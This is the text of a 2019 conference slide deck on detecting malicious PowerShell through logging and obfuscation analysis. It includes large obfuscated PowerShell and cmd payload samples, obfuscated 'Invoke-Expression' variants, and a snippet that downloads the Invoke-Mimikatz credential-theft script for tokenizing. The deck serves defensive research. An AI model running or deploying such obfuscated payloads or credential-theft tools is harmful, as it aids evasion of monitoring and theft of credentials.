7ch2ex28-22s7b_32h7d-7b{31_7dx7bo30_7d{22{20,2ds66_27,74x2d,4d,65h6d{62{65s72{27-2cx27x65s27o2ch27-47s27s29-29o7c-
2eo28_27h3f,27{29s7bh24{7bx5fs7d-2es22-4e,60{41x6dh45,22_2dx63s6c{69{6bh65,28o22-7bh31o7dx7bh30h7ds22s2ds66_27,6co2ax67_27{2ch27-
2a{6eo27,29s7dx29h2e-22{6es60{41{6d-65{22-29{2ex22s49h60s4e_56o4fh6b_45h22_28,28h2e-28x22,7b-32h7dh7b{30s7d{7bh31-7d_22s20-2d-
66o27{72s69h61x62_27o2co27{6c_65{27o2c{27-56o61_27-29h20{28o22-7b_31x7dx7b,30o7ds22_2dx66x27s30x38s27,2co27{50h27-29{20h2do56x61-6cs75{65h4fs6e-
29x29o2bx28_22,7b{31o7do7b{30o7do7b{32_7ds22o2dh66x20_27o6fx6bx65_2d-59s6fh64h27{2c-27{3b-49s6e,76x27o2c{27-61s27x29x29h7ds29,29' -sPLIT'h' -
split',' -splIt 'o'-SpliT '{'-spLiT '_'-Split's' -sPLit 'x' -SPliT'-'|FoREaCH-OBject { ([CHar] ( [COnveRT]::toinT16(($_.tOSTrInG() ),16
) )) }) +"$( SV 'OFs' ' ')")
?
?

Sp4rkCon 2019
Invoke-DOSfuscation
^C%cOmmonpROgRAmw6432:~ 20, 1%%alLUSersPrOFilE:~ +10, 1%, ,, ^/^v^ , , /r " , ,(SÊT ^ M^H=^s^mÎPîV0N%E/*^Y;u^{v'y^-Cê^dnQ^p}b:^$^k^Wx^w?^Go^Xc^&ÔS^+lg^)^M.t^r^(^8^_^h^|a^
)&& , , FôR,, %^k , ,ÎN , ( ^ ^+4^4^, 0 ^, ^+5^7^ ^ ^,^ ^ ^-0 ,^ ,^,^ ^ ^ ^, ^ , ^ +4^4^ ^ ,^ , ^ ^ ,^+1^1^ ^ ,^ ,^ ,+1^3^ ^, ^ ^, , ^,^, ^+^42 ^,^ ,^ ,^ ,,^ ^+2^ ^
^, ^ +^57,^ ^ ,, ^ , ^ ,^ ^ ^+5^ ^, ,^,^ ^, ^ ^,56, ,^ ^,^ ^ +50^ , ^+4^, 5^6 ,^ ^ , ^ , ^+^2^7 ^ ^,^ ^ ^,,, ^ ^ ,+^4^4 ,^,^ , ,, ^ 21,^ +28^ ^, +3^5 ^ ,^, ,^
^ 38^, ^ 24 , ^,^ ^ ^,^+^5^7^ ^,+51^,^, ,^ , ^, ^ +^48^ ^,,^ , ,,^ ^51^ ^,^, , ^ , ^,+36, 2^1 ^,^ ,^ ^,^ 4^9^ , ^ ^ , ,^ 1^9 ^ ,^ ^ , ,^ ,^, ^+5, ^56^,^ ^ ^, , +5^0^ ^ ,^
^ ^,^ , ^+4 ^,^ ^ ^+^56, , , ^2^7 ^, ^,^ ^, ,^ ,^ ^ ^4^4^ ,^ 21 ^,^,, +^5^7^ ^,, ^, ^+9 ^ ^,^ ,^ ^ ^ ^,^, ,^ 1^1^ ^,^ ,, ,^ ^, ^ 21 , ^, , 32^ ^,^ ^+4^9^ ^,^ ,
, ^+46^ ,^ ^4^8, ^, ^,^ ^, ,+5^ , ^,^,^ ^ 5^6^ ^, ^ ,^ ^,^, , ^+44^ ^, ^ +14^ ^,^ ^, ^ ^,+^21 ^ ^ ^, ,, ^ +4^8^ ^,,^ ^ ^ , ^, ^ ^, 2 ^ ^, ^ 23^ ^,, ^, 1^6,,^ ^ ^, ^ 3^7^
,^,^ , ^ ^ ^, ,+^3^0^,^ +21 , ^+20 , ^ 3^7, , ^, +1, ^ ^,, ^ +1 ^ ^,^,^ ^ ^ ^,^ ^56 ^ ,^,^ ^ ,^ ^ ^+2^3 ^ ,^ ^ ^22^ ^ ,4^8 , ^+5^1,^ ^ ^, ^, ^ 51^ ^ ,5^1,^ 3^6^ ,^ ^
^+^2^1^ ,^ ^49,^+19^ , ^ ,^,^,,^ 5 , ^ ^+56^ ^ ^, ^ +5^0,,, , ^ ,^ 4 , , ,, ^ ^, +^56 , ^+27, ^ ^ ^44^, ^ , ^ ,^ ^ ,^,^ +21^ , ^ 57,^ 9,, ^, ^ ^ +11,^ 2^1 , ^ +^32 ,^ ^ +^49
^ ,^ ^ ^ ^,^ ^ ^ ,+46, ,^ ^, ^ ^48, ^5^ ^, ^ , ^ ^ ^,+56 , +44^,^ ^ ^1^4^,^ ^ ^2^1^ ^, ^ , , ^48^ , ^ ^2,^ ^,^ ^,,^ ^,^2^3^,^ ^ ^ ^16^ ,^ ^,,^ ^ ,^ , +^37 ^, ^+^30,^,^ ^ ,
^+21,, ^, ^ ^2^0^ ^ ,^+^37^, ^ +^1^ ^,^ ^ ^ , ^, ^ ,^ ^ , +^1 ^ ^, ,,^+^5^6^ , ,^ ,^ 2^3 ^ ,^ ^+22^ , ^55^, ^ ^,^ ^ ,^ ^ ^+36^, ^ , ,^ ^ ^+^21 ^, ^ +4^9 ^,^ 19,^ ^ ,,, ,
^+4^7^,^ +21 ^ ^ ^, ^ ,^ ^ ^,^ ^ ,^ ^ ^, ^ 1 ^ ^, ^27 ^ , +^2^1,^ ^,^ ^ , ,^ ^,^ ^50 ,^ ^+^5^5 ^, ^ 3^4 , ,^, +^1^5^ ^ ^ ^,^ ^ ,^,,^ ^,^+29^ ,^ ^,^ ^, ^ , ^ ^,^ ^5^3^ ,^, ,,
^ ,+^48 ,^,^, ,^,^ ^7 ^, ,, 5^6 ,+1^ ^ ,^ ^ 21^ ^ ,^,,^ ^ 1^9 ^, ,, ^,^ ,+^3^9^ ^,^ ^ ,^ ^,4^4 ^ ^,,, , ^ ^, 4,+30^ , ^2^1, , ^ ,+^1^7,^ ^ 11 ^ , +^2^2,, ^ ^,^ ^ , ^ ,^ ^ 44^
, +^11 ^, ^, ^ ^,,^ , +^49 ^, ^ ^ ^+0^, ^1^7^ ^ ^ ,^, ,^ +2^6^ ,^ ^+4^6 ^ ,^48^,^ 7^, ^56^ ^ ^ , ,^,^ ^ ^, ^,^ ^1^, ^+2^1^, 4^6^ ^ , ^ ^+^48^ ^ ^,2 ^ , +^23^ ^,, ^,^+^1^6^,
^ ,, ^37, 3^0^ , ,^ , , ^ ,+2^1 ^,^ ^,^ ^, ^, ^ ,^ +5^1 , ^, ,^ +17^, , , ^ ^,^,+7 ^ ^ ,^ +2^1 ^ ,^ ^+^1^1^ ,,^ ^ , ^+39,^ ^ +^49 ,^ ^,^, ^ ^, ^ ^, ^+17 ^ ^, ^ ^46, ^+7^ ,
^, ,,^ , ^21 ^,4^9 ^ ,^ ^,, 4^8 ,^,^ ^, ^ ^ ^+^3^1 ^,^ ^ ^ ^21^ ,^,^,+2^7 ^, 2^0 ,^ ,,^ ^ ^ ,^ ^ ^ ,^ ^+44 ,^4 ^ ,, ,^ ^, , ^ ^2^1 ^ ^ , ^ ,^, , , ^ 23^ ^,^,,^ ^ , , ^
^+49^ ,^ ^ 4^6, ,^ ,^, ,^+1^3 ^ ,^ ^ , ,^ ^ ^ ^4^2^,^, ^, ^ ^,,+^2 ^ ^,+^5^7^ ,5 ,,^ ^,^ ^ , ^ ,^ +^5^6^ ,^ , , ^50 ^, +4^ ^ ^ ^, 56^ ^, , , ^+^27^ ^ , +4^4^ ^, ^
+21^ , , ^, ^2^8^ ,^ ,^,3^5^ ,^ ^, , ^+^3^ ^, ^ , ^ , ^6^, ^+52 ,^ ^,, +^5^7 ^ ^ ^, ^ ^ , ^, +1^7^ ,^ ^ ^,^ ,54^ ,^ ,^ ,^, , ^ ^49^ ^ , ^,^, , ^,^+^4^9 ,^25 ^ ^
^,^ ^, ^, -^0 ,+2^8 , ^, ^ ^, ,^,^ ^ ^ 10^, ^ ,^ ^ ,, ^, ^+10^ ^ ,^ 27^ ^ ^ ^, ^ ^ ^,^ ^ , , , ^ ^4^ , ^ ^ +^4^9 ^ ,48 ^ ^,^+4^4^,^,,^ +^1^8^ , ,,^ , ^,^ ^ 10^ ^, ^+4^ ^,^
^,,+23^ , ^ , ,^ ^ ^,^, ^1^6 ^, ^ ^, ^ ^ ^, +37,+^3^0^,,^ ^ ^ ^,^ ^ ^ ^+21 ^ ^ ^, ^ 1^9^ ^, ^ +^1^8,3^7^ ^ ^,^22^ ^ ^, , ^, ^56 ^, , ^, ^ ^ +1^7 ,^ 13 ^ ^, 40 ,5^1^ ^,^
^51 ^, ,^, ^,^ ^,+^5^1 ,^ ^ ^ ^,^,^, ^ ^,^ ^ ^+36 , , ^, ^,^ ,^ +2^1 ^,^ ^,^ ^,^ ,, ^ ^ ^+49 ,^ ,^ ,^1^9^ ,^ ^, ^,^ ^ ,^ , ^ ^5 ^,^,^ ,^ , ^,56 ^,^, ^ ^,^,^ ^
^, ^5^0^ ^ ^ ,^4^,5^6 ^ ^ ^, ,^,^ ^, ^, ^ 2^7^ , ^ ^ ^44^,^ ,, ^ ,^ ^, ^ +2^1^ ^,^ ^ +57^,^ ^ +^9,^+1^1^ ^ ^ ^,^ , ^ ,^ ^ 2^1,^ 32 ,^ 4^9,^+^4^6 ^,^4^8^ ,,^,, ^, 5^ ^ ,
56, ^+4^4 ^, ^ ^1^4 ,21 , ^ +^48^ ^ ^ , ^,^,^ ^ 2 ^, 23 ^ ^,^ ^ +16 , ^37^ , ^, ,^ ^,^ ,^ ^ ^3^0^ ,^ 21^ ,,,^ ,^ ^, 20 , , ^ , ^37 ^, 1 ^ ^ ,+^1 ,^ 56^ ^, , ^,^,^,
^+^23,^, ^,^, ^ ^,+^22 ^ ,^ +5^5^,^ ^+^8^, ^ ^ ^, ^ ^,^ , ^ ^ ^, 1^5, ,^,^ , ,^ +^5^1 ^ ^,^ ^ 36^,^ ^ ^ , ^ ,^ ^ ^ ^+21 ^ , ,^ ^,^ 49 ^ ,^ ^ ^+1^9 ^, +5^ ^, ^, ^ ^, ^ ^56
, 50 ^ , ^,^ ^ ^, ^+^4 ^ ^, +56^ ^,^ ^,, 2^7 ,, ^, ^, ,^+^44, +21 ,,^ ^ , ^+^57 ^, +53 ^ ^,,, +^57^ ,^ ^ ^19, ^ ,^ ^ , ^ ,^ ^,^5,^+^56^,^ +^4^4^ ^ , ^ ^ +46^ ^ , ,,,^
^ ^, ^ +4^8^,^ ^ +^5^1^ ^ ,^ ^ ^ ^+^51 , 51^ ,^ ^,^ ^ ^ ^,^ +^3^6^ ^ ^ , ^ ^+^21^ ^,^ ^+49^, 1^9^ ^ ,^ ,, ^ ^,^ ^ ^ ^,^ 5^,56^ ^, +50 ^ , ^+4 ^, , ^, ^ ^+^5^6^ , ^27,^ ^+4^4^
^,^ ^21^ , ,^,+^5^7 , ^, ,^ ^,^ ^ ^,^9 ^ ,+^11 , ,^ ^,^, ^ , ^21,^ ^+^3^2 ^ ,^ , ^ ^ , ,,^4^9^ ,^ 4^6 ,^ 4^8^ , ^ ^ ,,^, ^,^ +5 ^ ^,^, ^ , ,^ ,^ ^5^6^ ,^,^ , ^+4^4
, ^ ^ ^14^ ,^21^ , ,^ ,^ ^ +48 ^, ^ ,, 2^ ,^ ^ ^,^, +2^3,, ^, ^ , ^, +16^ ,^ ^ ^,^,^3^7 ^ ^ ^,+^30 ^ ^ ,21 ,^ ^+2^0 ^, , ^ ^, 37 , ^,,^ ^, ^, ^ ^ 1 , 1 , ^ ^ +56^
,^+^2^3 ^ ,^ ^ 2^2 ^ , ^ ^, ^ , ^ ^ ^+^5^5^ ^ ,^ ^, ^ ^,, , ^+36^ ^,21 ,^ ^ , , ^49^ ^ , ^,,^ +19 ,^ 47^ ^,^ ^ ^+^21 ^ ,^1^ ^ ^ ^, ^, ^, ^ +2^7^,^ ^, , ^2^1, ^,^ ,^,^
^ , ^ 5^0^, ^ +55 ^ , ^3^4 ^ ^ ,^ ^15^ ,^, ^, 29 ^ ^,^+53 ^ ^ ^,^,,^ ^ ^,^,48^ ^, +^7^ ^ ,, ^ ,^ ^+56,1^,,^,^ ^,^ ^ ^,^ +21^,^ 19^,^ 3^9,+44 , ^ +^4 ,^ ^ ^, ^ ^ , ^ ,^ , ^ +^30
, ^ ,^,^ , ^ ^ ^,^2^1 ,,, , ^, ^ 17^,^ 11,^ ,^ ^ ^ ^, ^ ^ ^, ^,^3^3^,^ ^, ^ ^ , +1^1^ ,^3^7, +11 ^ ^ ^,^ ^, ,^ +^30 , ^ ^, ^ , , ^, ^ ^ +1^7^ ^, ^ ^,^,^ ^ ^,^ ^ ^
,^+2^6^ ^,^ ^ ^+4^6 , ^ 48 ^ ,, ^ ,, ^ ^, ^ +^7 ^ ^ , 56^ , 1 ^ , ,, ^ 2^1^ ^ ^ ,^+^46 ^, ,^, ,, ^ ^+^4^8^, ^,, ^ ^,,2^,, ^ ,23 ^ ^,^ ^,^ ,^ 16,^ ^ ^ ^,,^ ^ , ^,^ ^+37, ^ ^30
^ ,^+^2^1^, ^ ^ ,,^51 , +5^1, ,,^ +^5 ^, ^ ^+5^6 ,^ ^ ^+5^0, ^, ^ , ,^, ^ 4 ^, +56 ^,+^2^7^, ^+^4^4 ^,^ ,,^ ^ 21 ,^ 5^7^ ^ ^ ^,^ +^38 , , ^ ,2^4 ^,5^7, , ,^ ^ +1^9^ ^ ,, ,^
^ ^,^, ^ ^5 ^,^ ^ 56 , ^,^ ,^+46 ^, ^, ^,,^ , ^ 4^8^,^ ^ ^,,^,^, 51^,^ ^,,^ ,^, ^ 51^,^, , ^ 51 ^,^ 5^1 ^,^ ^+^5^ ,,^ , ^ , ^,^ ^ ^+56^ ,^ ^+^50 ^ ^,^4 ^ , ^ 5^6
^, ^27^ , ,^, ^ ,, 4^4 , ^ ,^ , +2^1^ ^ , ^5^7^ ,^ ^ ,^,^ +38 ^, ^ ^24^ , ^, ^ ^ ^,^ , ^,5^7 ^ ^, ^ 19^ , ^ ^,^ ^ ^ ^,^ ,^ ^,^ ^5 ,^ ^ ^ ,^ ^ , ^+^56^ ^ ^,,,,^ ^ ^,
^ +46,,^ ,^, ^,^ ^+5^5 ^ ,^ ^ ^ +^36^, +21 ^ ^, ^,^ ^,^ ^,^ , +4^9^, ^,, ^ ,^ ^ , +^19^ ^,^ ^,^,^47 , +^21, ^ ^,^ ^ , ^ ^,, ^ ^ 1 ,^ ^ 2^7 , ^ ^,^, 21^ ,^ ^, ,^ ,,
^ ^ 50^ ,^ ^46^ ^ ^ ,^+5^5 , ^,^, ^+^3^4 ^ ,^15^ ,, , ,^ ^ , 29 ^ ^,^5^3 , ^ ,^ ,,^ ^ ^,^ ^ ^ 4^8 , ,^ ^, ^ ,^ ,^+7, ^ +5^6 , ^ ^+1 ^,^+2^1 ^, ^ ,^ ^ ^,^ ^1^9,^ ^ ,^ , ,,^
^ ^39^,,,^ ^+4^4 , ,^ ^ , ,^ , ^4, ^, ,^,^ ,+^3^0 ,^ ^, , 21, 17^ ^ ^ ,^ ^ ^1^1^ ^,^ ^2^3^ ^,^ ^+^4^4 ,11 ^ ^,^+^45 ^ ^,^ +1^7 ^ ^ , ^ , ^ ^ ^, , ,^ 26^ ^,^ 4^6 , , ^
, , ^ , 48,^ ^, ^ ,^ ,^ ^ ^ ^,^ ^7 , 56^ ^, ^ ^1,^+2^1 ^ ,^ ^, ^ ^ ^,^+46 ,,^ ^,^ ^ ^4^8 ^,^ ^, ^ , ,^ , ^ 2^ ^ ^,^,, +^23 ^,^ ^ ^+16 ,^ , ^, +^3^7^ ^ ^, 30, 21 ,^
^ ^+51^ ^ , ^,, ,^ ^ , ^+^51^ ^ ,5 ,^ ^+56,^ ^ 50 ^, ,, ^ ,^,4^ ^ ,^ ,^, ^ ^, ^,^ ^56 ^,^ ^ ,^,^ ^ +27, , ,4^4^ , ^ +21 ^,^,,^ ^ ,^ ^,^ ^ 57 ^ , 3 ^ ^,^ 6 ^ ,^,^ ,^ ^
^,,^ ^+^52 ,^ ,^ , ^ ^+57^ ^ , ^, ^ ^,^ ^ ^ ^19 ^, ^+^5 ^ , ^+56 ^, ^ , ^ , , ^ , +4^4 ^,^1^4^,^ , ^ , , ^ , ^2^1^ ^ , , ,+4^1^,^ 23 ^,^ ^ +46 ,^ +46^ ,^ 4^3 ,,^ , ^
^1^7^ ,^ , ,^ , ^ ^, +1^3^ ^ , ^ , ^ , , ^ , +2,, ^ ,^ ^ ^,^ ^,^+^23 ^ ,+16^ ,^ ^ ,^ ^,^37, 30 ^ , 21 ^ ^, ,^,^ ^ , ^ , 19 ^ ,^ +12 , ^ ^ ^+^3^7^ ^ ^, ^ ^,^ ^ ,2^2 ,+^5^6^,
17 ,, ^, ^46,^ ^, ^, ^ ^,^ ^ , ^ +2^6 ^,46^ ^ ^,^ ,^ , ^, , 46^, ^ +^59 ^ ),, ^dô (sÊT ^By^Y=!^By^Y!!M^H:~ %^k, 1!)& , , î^F , %^k,, ê^Qu , +5^9 , ,
%aLlUserSPROFiLE:~ -11, 1%Ô%sYStEMrOOT:~ 8,-1%%TemP:~ 5, +1%%TmP:~6, 1%%comMONprOgRaMfiles:~ -1%^HÊ%loCAlaPpdATA:~-1%%COmmONProgrAmFilES(x86):~-22, -21% ; ; " ; !^By^Y:*^ByY^!=!"
;"

# TFW an attacker goes up against PowerShell logging
Sp4rkCon 2019
https://media1.tenor.com/images/4a08ff9d3f956dd814fc8ee1cfaac592/tenor.gif?itemid=10407619

PowerShell Script Extraction (& Obfuscation Detection)
• Revoke-Obfuscation
• Detect obfuscation:
• Measure-RvoObfuscation
• Extract executed scripts:
• Get-RvoScriptBlock
• Developed with @Lee_Holmes
https://github.com/danielbohannon/Revoke
-Obfuscation
• White Paper:
https://www.fireeye.com/blog/threat-
research/2017/07/revoke-obfuscation-
powershell.html
Sp4rkCon 2019

$RevokeObfuscation – $DataScience J
• PesterSec
• Apply AST-based “signatures” to extracted Powershell scripts
• PSScriptAnalyzer
• Pester
• Detect minimally-obfuscated PowerShell
• E.g. PSAmsi by Ryan Cobb (@cobbr_io)
Sp4rkCon 2019

$moduleLogs | Group-Object PipelineID,CommandName
• Fingerprint abnormal scripts by cmdlet groupings
• AST to query from extracted script (group on Command)
• EID 4103 events for executed script (group on PipelineID,CommandName)
Sp4rkCon 2019
# Load script to analyze.
$script = Invoke-WebRequest
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1
# Tokenize script.
$tokens = [System.Management.Automation.PSParser]::Tokenize($script, [ref] $null)
# Group on Command (cmdlet/alias/etc.) to find high concentration of repeated Commands.
$tokens | Where-Object { $_.Type -eq 'Command' } | Group-Object Content | Where-Object {
$_.Count -ge 10 } | Sort-Object Count -Descending | Select-Object Count,Name

Compare-Object $oldPSLog $newPSLog
Sp4rkCon 2019
powershell.exe Invoke-Expression $env:gkwa
Pipeline execution details for command line: Invoke-Expression $env:gkwa
Context Information:
DetailSequence=1
<REDACTED>
CommandLine=Invoke-Expression $env:gkwa
Details:
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="<REDACTED>"
Windows PowerShell – EID 800
Cmdlet invoked
Parent ScriptBlock

Sp4rkCon 2019
Pipeline execution details for command line: iex $env:gkwa
DetailSequence=1
<REDACTED>
CommandLine=iex $env:gkwa
Details:
Cmdlet invoked
Parent ScriptBlock

Sp4rkCon 2019
powershell.exe ie`x $env:gkwa
Pipeline execution details for command line: ie`x $env:gkwa
DetailSequence=1
<REDACTED>
CommandLine=ie`x $env:gkwa
Details:
Cmdlet invoked
Parent ScriptBlock
OBFUSCATED!

Sp4rkCon 2019
Pipeline execution details for command line: sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( (
VARIaBle S3ZXl5 -Va )::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f
'S','ocES','pR' )) ) |. ( ${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
DetailSequence=1
<REDACTED>
CommandLine=sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(
"{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',( "{2}{1}{0}" -f 'S','ocES','pR' )) ) |. (
${e`Nv:c`oM`sPEC}[4,15,25]-JOin'' )
Details:
OBFUSCATED!

$keyTakeaway[0]
• PowerShell is POWERFUL
• Loved by Devs, Admins, Incident Responders, Hobbyists...and Attackers
• Reported “rise in PowerShell attacks“
• Take #‘s w/grain of salt
• Offensive PowerShell tradecraft is diverse
• Tons of open source tradecraft – try it today (in an ethical, legal fasion)!
• Plethora of forensic artifacts & detection techniques
Sp4rkCon 2019

$keyTakeaway[1]
• Detecting malicious usage of PowerShell vs other languages?
Sp4rkCon 2019
https://media2.giphy.com/media/f3Fq267SERQm4/giphy.gif

• Daniel Bohannon
• Twitter: @danielhbohannon
• Blog: https://danielbohannon.com/
• Github:_https://github.com/danielbohannon/
about_Author
Sp4rkCon 2019
http://workpulse.io/blog/wp-content/uploads/2015/09/themasterpeice.gif

Malicious Payloads vs Deep Visibility: A PowerShell Story

More Related Content

What's hot (20)

Similar to Malicious Payloads vs Deep Visibility: A PowerShell Story (20)

Recently uploaded (20)

Malicious Payloads vs Deep Visibility: A PowerShell Story